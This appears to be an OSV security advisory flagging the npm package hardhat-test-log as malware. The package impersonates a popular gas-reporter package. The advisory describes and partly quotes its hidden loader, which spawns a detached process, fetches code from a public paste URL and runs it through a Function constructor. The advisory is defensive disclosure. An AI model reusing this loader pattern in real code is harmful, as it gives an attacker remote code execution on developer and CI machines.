hardhat-test-log @1.1.2
Vulnerability report · Last retrieved from osv.dev June 29, 2026 at 9:56 AM UTC
OSV ID
MAL-2026-6369
Ecosystem
npm
Summary
Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: the README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy.

index.js exports log as the reporter, but the function contains var opt = 1; if (!opt) {...legitimate reporter code... } else { gestest(); }. The dead-code gate guarantees that the else branch always runs, calling utils.connectNet.

utils.connectNet (lib/utils.js) spawns node lib/syncResolve.js as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output.

lib/syncResolve.js then performs axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key':... } }), extracts the Cookie field from the response, and executes it in-process via new Function.constructor('require', result)(require), giving attacker-controlled code full Node require access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will.

Installing or using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.
Source: amazon-inspector (741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed)